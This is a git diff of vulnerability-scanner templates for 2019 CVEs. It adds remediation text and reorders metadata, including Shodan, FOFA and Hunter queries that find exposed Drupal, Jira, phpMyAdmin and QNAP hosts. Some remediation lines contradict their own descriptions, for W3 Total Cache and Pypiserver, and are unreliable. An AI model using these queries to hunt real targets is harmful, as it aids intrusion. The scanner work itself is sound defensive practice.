revive_adserver + shodan-query: http.favicon.hash:106844876 tags: edb,packetstorm,cve,cve2019,revive,adserver,rce http: diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 6ccc1d65cc..8ee57782c1 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). + remediation: | + Update to the latest version of WordPress Sell Media or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b - https://nvd.nist.gov/vuln/detail/CVE-2019-6112 @@ -15,13 +17,13 @@ info: cve-id: CVE-2019-6112 cwe-id: CWE-79 epss-score: 0.00126 - cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* epss-percentile: 0.46438 + cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: graphpaperpress product: sell_media + framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,xss http: diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index feef9d510f..553ab1b2fa 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases. + remediation: | + Apply the official security patch provided by Drupal to fix the deserialization vulnerability. reference: - https://www.drupal.org/sa-core-2019-003 - https://www.synology.com/security/advisory/Synology_SA_19_09 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-6340 cwe-id: CWE-502 epss-score: 0.97369 - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* epss-percentile: 0.99849 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"drupal" vendor: drupal product: drupal + shodan-query: http.component:"drupal" tags: cve,cve2019,drupal,rce,kev http: diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 6e6c7c19fa..d8e67ef730 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php. + remediation: | + Update to the latest version of W3 Total Cache plugin (0.9.3 or higher) to mitigate the vulnerability. reference: - https://vinhjaxt.github.io/2019/03/cve-2019-6715 - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html @@ -15,13 +17,13 @@ info: cvss-score: 7.5 cve-id: CVE-2019-6715 epss-score: 0.23312 - cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95923 + cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: boldgrid product: w3_total_cache + framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,ssrf,packetstorm,intrusive http: diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 062f277ade..eefec8e909 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls. + remediation: | + Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability. reference: - https://paper.seebug.org/1112/#_4 - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2 @@ -18,16 +20,16 @@ info: cvss-score: 5.9 cve-id: CVE-2019-6799 epss-score: 0.13969 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* epss-percentile: 0.94952 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: - max-request: 6 - fofa-query: body="pma_servername" && body="4.8.4" - hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - shodan-query: title:"phpmyadmin" verified: true + max-request: 6 vendor: phpmyadmin product: phpmyadmin + shodan-query: title:"phpmyadmin" + fofa-query: body="pma_servername" && body="4.8.4" + hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive http: diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 3d0ea8f874..ca344b97b4 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI. + remediation: | + Upgrade to Pypiserver version 1.2.5 or later. reference: - https://vuldb.com/?id.130257 - https://github.com/pypiserver/pypiserver/issues/237 @@ -16,14 +18,14 @@ info: cve-id: CVE-2019-6802 cwe-id: CWE-74 epss-score: 0.00113 - cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* epss-percentile: 0.44064 + cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"pypiserver" verified: true + max-request: 1 vendor: python product: pypiserver + shodan-query: html:"pypiserver" tags: cve,cve2019,crlf,pypiserver http: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 7624e65915..c3acdeaf73 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-7192 - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2019-7192 cwe-id: CWE-863 epss-score: 0.96645 - cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* epss-percentile: 0.99471 + cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true - shodan-query: 'Content-Length: 580 "http server 1.0"' + max-request: 3 vendor: qnap product: photo_station + shodan-query: 'Content-Length: 580 "http server 1.0"' tags: packetstorm,cve,cve2019,lfi,rce,kev,qnap,qts http: diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 4538c704c2..672f13dbd9 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -6,19 +6,19 @@ info: severity: medium description: | Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead. reference: - https://github.com/verifysecurity/CVE-2019-7219 - https://stash.kopano.io/repos?visibility=public - https://nvd.nist.gov/vuln/detail/CVE-2019-7219 - remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.00113 - cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* epss-percentile: 0.43991 + cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zarafa diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 55b74bcc27..67aeaeb7f0 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. + remediation: | + Upgrade Sonatype Nexus Repository Manager to a version higher than 3.15.0. reference: - https://github.com/jas502n/CVE-2019-7238 - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 @@ -14,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7238 epss-score: 0.97478 - cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* epss-percentile: 0.99947 + cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonatype diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 8db7454fda..7941fd74d0 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Linear eMerge E3-Series devices are vulnerable to local file inclusion. + remediation: | + Apply the latest security patch or update to a non-vulnerable version of eMerge E3. reference: - https://www.exploit-db.com/exploits/47616 - https://applied-risk.com/labs/advisories @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-7254 cwe-id: CWE-22 epss-score: 0.86088 - cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.9813 + cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: nortekcontrol diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index b7c1b81fb0..ec689977bb 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://www.applied-risk.com/resources/ar-2019-005 - https://applied-risk.com/labs/advisories @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-7255 cwe-id: CWE-79 epss-score: 0.01544 - cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.85509 + cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"eMerge" verified: true + max-request: 1 vendor: nortekcontrol product: linear_emerge_essential_firmware + shodan-query: http.title:"eMerge" tags: emerge,xss,packetstorm,cve,cve2019,nortek http: diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 1a628c7bb4..d0182f2e2a 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities. + remediation: | + Apply the latest security patch or update to a non-vulnerable version of eMerge E3. reference: - https://www.exploit-db.com/exploits/47619 - http://linear-solutions.com/nsc_family/e3-series/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2019-7256 cwe-id: CWE-78 epss-score: 0.97316 - cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99808 + cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: title:"eMerge" + max-request: 2 vendor: nortekcontrol product: linear_emerge_essential_firmware + shodan-query: title:"eMerge" tags: cve,cve2019,emerge,rce,edb variables: file: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 86360f01ba..8a7e97309a 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by Optergy to fix the open redirect vulnerability. reference: - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html - https://applied-risk.com/resources/ar-2019-008 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-7275 cwe-id: CWE-601 epss-score: 0.00483 - cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:* epss-percentile: 0.72859 + cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: optergy diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 7aae70d16a..8ad6f5140f 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow. + remediation: | + Apply the latest firmware update provided by the vendor to fix the local file inclusion vulnerability. reference: - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/ - https://vuldb.com/?id.136593 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-7315 cwe-id: CWE-22 epss-score: 0.01275 - cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.83989 + cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: genieaccess diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 6acfb66c0c..24fa81fe0e 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -5,6 +5,8 @@ info: author: _darrenmartyn severity: high description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability. + remediation: | + Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ - https://nvd.nist.gov/vuln/detail/CVE-2019-7481 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-7481 cwe-id: CWE-89 epss-score: 0.93374 - cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.98715 + cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonicwall diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 7cb33ae203..5d45da230f 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter. + remediation: | + Upgrade to a patched version of KindEditor or apply the necessary security patches provided by the vendor. reference: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 @@ -14,8 +16,8 @@ info: cve-id: CVE-2019-7543 cwe-id: CWE-79 epss-score: 0.00113 - cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* epss-percentile: 0.44064 + cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kindsoft diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 82209e9b5b..c84527d2f4 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + remediation: | + Apply the latest security patches or upgrade to a patched version of Kibana to mitigate the vulnerability. reference: - https://github.com/mpgn/CVE-2019-7609 - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-7609 cwe-id: CWE-94 epss-score: 0.97232 - cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* epss-percentile: 0.9975 + cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elastic diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 60ea67c86c..41a23a3590 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: high description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. reference: - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13 - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py @@ -17,15 +19,15 @@ info: cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.14515 - cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* epss-percentile: 0.95041 + cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: adobe + product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - vendor: adobe - product: experience_manager tags: cve,cve2019,aem,adobe http: diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 1d1d7edaf6..4c13e7fb2c 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + remediation: | + Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/46399/ - http://qdpm.net/download-qdpm-free-project-management @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.01669 - cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* epss-percentile: 0.86063 + cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true - shodan-query: http.favicon.hash:762074255 max-request: 3 vendor: qdpm product: qdpm + shodan-query: http.favicon.hash:762074255 tags: cve,cve2019,xss,qdpm,authenticated,edb http: diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index 9a33a84dfb..d7e40df32a 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -5,6 +5,8 @@ info: author: Kishore Krishna (siLLyDaddy) severity: high description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion. + remediation: | + Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-69241 - https://nvd.nist.gov/vuln/detail/CVE-2019-8442 @@ -13,13 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8442 epss-score: 0.9715 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.99696 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2019,atlassian,jira,lfi,intrusive http: diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index f75ae6c001..3229b25e29 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. + remediation: | + Apply the latest security patches and updates provided by Atlassian to fix the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-69777 - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 @@ -14,13 +16,13 @@ info: cve-id: CVE-2019-8446 cwe-id: CWE-863 epss-score: 0.11721 - cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* epss-percentile: 0.94559 + cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira_server + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2019,jira http: diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index da0e6507ac..d4b9e40d57 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Jira to version 8.4.0 or later to fix the information disclosure vulnerability. reference: - https://www.doyler.net/security-not-included/more-jira-enumeration - https://jira.atlassian.com/browse/JRASERVER-69796 @@ -15,13 +17,13 @@ info: cve-id: CVE-2019-8449 cwe-id: CWE-306 epss-score: 0.1884 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.95564 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira,disclosure,packetstorm,cve,cve2019 http: diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index f5aa14d15c..dd8e8a2557 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -5,6 +5,8 @@ info: author: TechbrunchFR severity: medium description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Jira to version 8.4.0 or later to mitigate the SSRF vulnerability. reference: - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-8451 cwe-id: CWE-918 epss-score: 0.97115 - cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* epss-percentile: 0.9968 + cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira_server + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019 http: diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index d28d969ae5..fb7cb9cab8 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion. + remediation: | + Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability. reference: - https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903 - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-8903 cwe-id: CWE-22 epss-score: 0.0192 - cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* epss-percentile: 0.87107 + cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: totaljs product: total.js + framework: node.js tags: cve,cve2019,totaljs,lfi http: diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index fd988e44d8..b39fa59d00 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php. + remediation: | + Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks. reference: - https://www.exploit-db.com/exploits/46429 - https://sourceforge.net/projects/hoteldruid/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2019-8937 cwe-id: CWE-79 epss-score: 0.00921 - cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* epss-percentile: 0.80927 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: digitaldruid product: hoteldruid tags: packetstorm,cve,cve2019,xss,hoteldruid,edb diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 0df14a6247..0cfcdbe715 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery." + remediation: | + Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities. reference: - https://www.exploit-db.com/exploits/45158 - https://nvd.nist.gov/vuln/detail/CVE-2019-8982 @@ -14,8 +16,8 @@ info: cve-id: CVE-2019-8982 cwe-id: CWE-918 epss-score: 0.02146 - cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* epss-percentile: 0.87849 + cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wavemaker diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 86bbe9c4bc..8af5401662 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring. + remediation: | + Apply the latest security patch or upgrade to a newer version of ZZZCMS. reference: - https://www.exploit-db.com/exploits/46454/ - http://www.iwantacve.cn/index.php/archives/118/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-9041 cwe-id: CWE-917 epss-score: 0.01127 - cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* epss-percentile: 0.82839 + cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zzzcms diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index e59052ad2f..c1387c73e5 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter. + remediation: | + Update to the latest version of the plugin or apply the provided patch 